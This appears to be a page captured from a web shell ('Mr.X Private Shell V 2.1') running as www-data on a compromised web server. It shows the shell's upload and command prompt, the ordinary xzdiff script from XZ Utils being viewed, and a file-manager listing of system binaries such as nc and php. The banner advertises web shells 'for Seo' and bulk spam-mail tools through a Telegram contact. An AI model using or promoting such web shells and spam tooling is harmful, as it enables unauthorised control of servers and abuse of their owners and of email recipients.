__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.214: ~ $
#!/bin/sh
# SPDX-License-Identifier: GPL-2.0-or-later

# Copyright (C) 1998, 2002, 2006, 2007 Free Software Foundation
# Copyright (C) 1993 Jean-loup Gailly

# Modified for XZ Utils by Andrew Dudman and Lasse Collin.

# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.

# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.


#SET_PATH - This line is a placeholder to ease patching this script.

# Instead of unsetting XZ_OPT, just make sure that xz will use file format
# autodetection. This way memory usage limit and thread limit can be
# specified via XZ_OPT. With gzip, bzip2, and lzop it's OK to just unset the
# environment variables.
xz='xz --format=auto'
unset GZIP BZIP BZIP2 LZOP

case ${0##*/} in
  *cmp*) prog=xzcmp; cmp=${CMP:-cmp};;
  *)     prog=xzdiff; cmp=${DIFF:-diff};;
esac

version="$prog (XZ Utils) 5.8.1"

usage="Usage: ${0##*/} [OPTION]... FILE1 [FILE2]
Compare FILE1 to FILE2, using their uncompressed contents if they are
compressed.  If FILE2 is omitted, then the files compared are FILE1 and
FILE1 from which the compression format suffix has been stripped.

Do comparisons like '$cmp' does.  OPTIONs are the same as for '$cmp'.

Report bugs to <xz@tukaani.org>."

# sed script to escape all ' for the shell, and then (to handle trailing
# newlines correctly) turn trailing X on last line into '.
escape='
  s/'\''/'\''\\'\'''\''/g
  $s/X$/'\''/
'

while :; do
  case $1 in
    --h*) printf '%s\n' "$usage" || exit 2; exit;;
    --v*) printf '%s\n' "$version" || exit 2; exit;;
    --) shift; break;;
    -*\'*) cmp="$cmp '"`printf '%sX\n' "$1" | sed "$escape"`;;
    -?*) cmp="$cmp '$1'";;
    *) break;;
  esac
  shift
done
cmp="$cmp --"

for file; do
  test "X$file" = X- || <"$file" || exit 2
done

# xz needs -qQ to ignore warnings like unsupported check type.
xz1="$xz -qQ"
xz2="$xz -qQ"
xz_status=0
exec 3>&1

if test $# -eq 1; then
  case $1 in
    *[-.]xz | *[-.]lzma | *[-.]lz | *.t[lx]z)
      ;;
    *[-.]bz2 | *.tbz | *.tbz2)
      xz1=bzip2;;
    *[-.][zZ] | *_z | *[-.]gz | *.t[ag]z)
      xz1=gzip;;
    *[-.]lzo | *.tzo)
      xz1=lzop;;
    *[-.]zst | *.tzst)
      xz1='zstd -q';;
    *[-.]lz4)
      xz1=lz4;;
    *)
      printf '%s\n' "$0: $1: Unknown compressed file name suffix" >&2
      exit 2;;
  esac
  case $1 in
    *[-.][zZ] | *_z | *[-.][gx]z | *[-.]bz2 | *[-.]lzma | *[-.]lz | *[-.]lzo | *[-.]zst | *[-.]lz4)
      FILE=`expr "X$1" : 'X\(.*\)[-.][abglmostxzZ24]*$'`;;
    *.t[abglx]z)
      FILE=`expr "X$1" : 'X\(.*[-.]t\)[abglx]z$'`ar;;
    *.tbz2)
      FILE=`expr "X$1" : 'X\(.*[-.]t\)bz2$'`ar;;
    *.tzo)
      FILE=`expr "X$1" : 'X\(.*[-.]t\)zo$'`ar;;
    *.tzst)
      FILE=`expr "X$1" : 'X\(.*[-.]t\)zst$'`ar;;
  esac
  xz_status=$(
    exec 4>&1
    ($xz1 -cd -- "$1" 4>&-; echo $? >&4) 3>&- | eval "$cmp" - '"$FILE"' >&3
  )
elif test $# -eq 2; then
  case $1 in
    *[-.]bz2 | *.tbz | *.tbz2) xz1=bzip2;;
    *[-.][zZ] | *_z | *[-.]gz | *.t[ag]z) xz1=gzip;;
    *[-.]lzo | *.tzo) xz1=lzop;;
    *[-.]zst | *.tzst) xz1='zstd -q';;
    *[-.]lz4) xz1=lz4;;
  esac
  case $2 in
    *[-.]bz2 | *.tbz | *.tbz2) xz2=bzip2;;
    *[-.][zZ] | *_z | *[-.]gz | *.t[ag]z) xz2=gzip;;
    *[-.]lzo | *.tzo) xz2=lzop;;
    *[-.]zst | *.tzst) xz2='zstd -q';;
    *[-.]lz4) xz2=lz4;;
  esac
  case $1 in
    *[-.][zZ] | *_z | *[-.][gx]z | *[-.]bz2 | *[-.]lzma | *[-.]lz | *.t[abglx]z | *.tbz2 | *[-.]lzo | *.tzo | *[-.]zst | *.tzst | *[-.]lz4 | -)
      case "$2" in
        *[-.][zZ] | *_z | *[-.][gx]z | *[-.]bz2 | *[-.]lzma | *[-.]lz | *.t[abglx]z | *.tbz2 | *[-.]lzo | *.tzo | *[-.]zst | *.tzst | *[-.]lz4 | -)
          if test "$1$2" = --; then
            xz_status=$(
              exec 4>&1
              ($xz1 -cdf - 4>&-; echo $? >&4) 3>&- |
                eval "$cmp" - - >&3
            )
          elif # Reject Solaris 8's buggy /bin/bash 2.03.
              echo X | (echo X | eval "$cmp" /dev/fd/5 - >/dev/null 2>&1) 5<&0; then
            # NOTE: xz_status will contain two numbers.
            xz_status=$(
              exec 4>&1
              ($xz1 -cdf -- "$1" 4>&-; echo $? >&4) 3>&- |
                ( ($xz2 -cdf -- "$2" 4>&-; echo $? >&4) 3>&- 5<&- </dev/null |
                eval "$cmp" /dev/fd/5 - >&3) 5<&0
            )
          else
            F=`expr "/$2" : '.*/\(.*\)[-.][ablmotxz2]*$'` || F=$prog
            tmp=
            trap '
              test -n "$tmp" && rm -rf "$tmp"
              (exit 2); exit 2
            ' HUP INT PIPE TERM 0
            if type mktemp >/dev/null 2>&1; then
              # Note that FreeBSD's mktemp isn't fully compatible with
              # the implementations from mktemp.org and GNU coreutils.
              # It is important that the -t argument is the last argument
              # and that no "--" is used between -t and the template argument.
              # This way this command works on all implementations.
              tmp=`mktemp -d -t "$prog.XXXXXXXXXX"` || exit 2
            else
              # Fallback code if mktemp is missing. This isn't as
              # robust as using mktemp since this doesn't try with
              # different file names in case of a file name conflict.
              #
              # There's no need to save the original umask since
              # we don't create any non-temp files. Note that using
              # mkdir -m 0077 isn't secure since some mkdir implementations
              # create the dir with the default umask and chmod the
              # the dir afterwards.
              umask 0077
              mkdir -- "${TMPDIR-/tmp}/$prog.$$" || exit 2
              tmp="${TMPDIR-/tmp}/$prog.$$"
            fi
            $xz2 -cdf -- "$2" > "$tmp/$F" || exit 2
            xz_status=$(
              exec 4>&1
              ($xz1 -cdf -- "$1" 4>&-; echo $? >&4) 3>&- |
                eval "$cmp" - '"$tmp/$F"' >&3
            )
            cmp_status=$?
            rm -rf "$tmp" || xz_status=$?
            trap - HUP INT PIPE TERM 0
            (exit $cmp_status)
          fi;;
      *)
        xz_status=$(
          exec 4>&1
          ($xz1 -cdf -- "$1" 4>&-; echo $? >&4) 3>&- |
            eval "$cmp" - '"$2"' >&3
        );;
    esac;;
  *)
    case "$2" in
      *[-.][zZ] | *_z | *[-.][gx]z | *[-.]bz2 | *[-.]lzma | *[-.]lz | *.t[abglx]z | *.tbz2 | *[-.]lzo | *.tzo | *[-.]zst | *.tzst | *[-.]lz4 | -)
        xz_status=$(
          exec 4>&1
          ($xz2 -cdf -- "$2" 4>&-; echo $? >&4) 3>&- |
            eval "$cmp" '"$1"' - >&3
         );;
      *)
        eval "$cmp" '"$1"' '"$2"';;
    esac;;
  esac
else
  printf '%s\n' "$0: Invalid number of operands; try '${0##*/} --help' for help" >&2
  exit 2
fi

cmp_status=$?
for num in $xz_status ; do
  # 0 from decompressor means successful decompression. SIGPIPE from
  # decompressor is possible when diff or cmp exits before the whole file
  # has been decompressed. In that case we want to retain the exit status
  # from diff or cmp. Note that using "trap '' PIPE" is not possible
  # because gzip changes its behavior (including exit status) if SIGPIPE
  # is ignored.
  test "$num" -eq 0 && continue
  test "$num" -ge 128 \
      && test "$(kill -l "$num" 2> /dev/null)" = "PIPE" \
      && continue
  exit 2
done
exit $cmp_status

Filemanager

Name Type Size Permission Actions
Phosh-OSK File 4.22 KB 0644
README File 100 B 0644
awk File 776.39 KB 0755
awk.1.gz File 18.96 KB 0644
builtins.7.gz File 508 B 0644
c++ File 1.07 MB 0755
c89 File 428 B 0755
c89.1.gz File 1.33 KB 0644
c99 File 454 B 0755
c99.1.gz File 1.39 KB 0644
cc File 1.07 MB 0755
cpp File 1.07 MB 0755
cyfmac43455-sdio.bin File 595.03 KB 0644
default-GM.sf2 File 5.69 MB 0644
default-GM.sf3 File 5.69 MB 0644
editor File 324.81 KB 0755
editor.1.gz File 8.1 KB 0644
ex File 1.79 MB 0755
ex.1.gz File 6.09 KB 0644
ex.da.1.gz File 5.51 KB 0644
ex.de.1.gz File 7.56 KB 0644
ex.fr.1.gz File 6.37 KB 0644
ex.it.1.gz File 6.85 KB 0644
ex.ja.1.gz File 6.69 KB 0644
ex.pl.1.gz File 6.15 KB 0644
ex.ru.1.gz File 9.99 KB 0644
ex.tr.1.gz File 5.74 KB 0644
faked.1.gz File 1.16 KB 0644
faked.es.1.gz File 1.39 KB 0644
faked.fr.1.gz File 1.41 KB 0644
faked.sv.1.gz File 1.36 KB 0644
fakeroot File 3.91 KB 0755
fakeroot.1.gz File 3.93 KB 0644
fakeroot.es.1.gz File 4.5 KB 0644
fakeroot.fr.1.gz File 4.64 KB 0644
fakeroot.sv.1.gz File 4.43 KB 0644
gnome-www-browser File 5.78 KB 0755
idmap-plugin File 66.01 KB 0644
idmap-plugin.8.gz File 664 B 0644
jsondiff File 1004 B 0755
libblas.so.3-aarch64-linux-gnu File 385.86 KB 0644
liblapack.so.3-aarch64-linux-gnu File 5.51 MB 0644
lightdm-greeter File 185 B 0644
lua-compiler File 194.68 KB 0755
lua-compiler-manual File 1.63 KB 0644
lua-interpreter File 259.18 KB 0755
lua-manual File 1.61 KB 0644
lzcat File 130.76 KB 0755
lzcat.1.gz File 23.44 KB 0644
lzcmp File 7.41 KB 0755
lzcmp.1.gz File 787 B 0644
lzdiff File 7.41 KB 0755
lzdiff.1.gz File 787 B 0644
lzegrep File 10.17 KB 0755
lzegrep.1.gz File 1006 B 0644
lzfgrep File 10.17 KB 0755
lzfgrep.1.gz File 1006 B 0644
lzgrep File 10.17 KB 0755
lzgrep.1.gz File 1006 B 0644
lzless File 2.33 KB 0755
lzless.1.gz File 780 B 0644
lzma File 130.76 KB 0755
lzma.1.gz File 23.44 KB 0644
lzmore File 2.18 KB 0755
lzmore.1.gz File 772 B 0644
mt File 131.48 KB 0755
mt.1.gz File 1.98 KB 0644
my.cnf File 1.1 KB 0644
nawk File 776.39 KB 0755
nawk.1.gz File 18.96 KB 0644
nc File 66.49 KB 0755
nc.1.gz File 6.29 KB 0644
netcat File 66.49 KB 0755
netcat.1.gz File 6.29 KB 0644
open File 31.53 KB 0755
open.1.gz File 2 KB 0644
pager File 275.29 KB 0755
pager.1.gz File 28.26 KB 0644
phar File 14.88 KB 0755
phar.1.gz File 2.75 KB 0644
phar.phar File 14.88 KB 0755
phar.phar.1.gz File 36 B 0644
php File 5.76 MB 0755
php.1.gz File 3.71 KB 0644
pico File 324.81 KB 0755
pico.1.gz File 8.1 KB 0644
pinentry File 130.52 KB 0755
pinentry-x11 File 130.52 KB 0755
pinentry-x11.1.gz File 1.38 KB 0644
pinentry.1.gz File 1.38 KB 0644
pybabel File 956 B 0755
regulatory.db File 6.23 KB 0644
regulatory.db.p7s File 1.09 KB 0644
rmt File 67.12 KB 0755
rmt.8.gz File 2.34 KB 0644
rview File 1.79 MB 0755
tdbbackup File 66.16 KB 0755
tdbbackup.8.gz File 1.62 KB 0644
unlzma File 130.76 KB 0755
unlzma.1.gz File 23.44 KB 0644
vi File 1.79 MB 0755
vi.1.gz File 6.09 KB 0644
vi.da.1.gz File 5.51 KB 0644
vi.de.1.gz File 7.56 KB 0644
vi.fr.1.gz File 6.37 KB 0644
vi.it.1.gz File 6.85 KB 0644
vi.ja.1.gz File 6.69 KB 0644
vi.pl.1.gz File 6.15 KB 0644
vi.ru.1.gz File 9.99 KB 0644
vi.tr.1.gz File 5.74 KB 0644
view File 1.79 MB 0755
view.1.gz File 6.09 KB 0644
view.da.1.gz File 5.51 KB 0644
view.de.1.gz File 7.56 KB 0644
view.fr.1.gz File 6.37 KB 0644
view.it.1.gz File 6.85 KB 0644
view.ja.1.gz File 6.69 KB 0644
view.pl.1.gz File 6.15 KB 0644
view.ru.1.gz File 9.99 KB 0644
view.tr.1.gz File 5.74 KB 0644
which File 1.05 KB 0755
which.1.gz File 463 B 0644
which.de1.gz File 859 B 0644
which.es1.gz File 588 B 0644
which.fr1.gz File 909 B 0644
which.it1.gz File 590 B 0644
which.ja1.gz File 726 B 0644
which.pl1.gz File 786 B 0644
which.sl1.gz File 652 B 0644
www-browser File 1.98 MB 0755
www-browser.1.gz File 14.34 KB 0644
x-cursor-theme File 30 B 0644
x-session-manager File 657 B 0755
x-terminal-emulator File 133.7 KB 0755
x-terminal-emulator.1.gz File 1.48 KB 0644
x-window-manager File 451.63 KB 0755
x-window-manager.1.gz File 1.55 KB 0644
x-www-browser File 848 B 0755
x-www-browser.1.gz File 1.27 KB 0644
Filemanager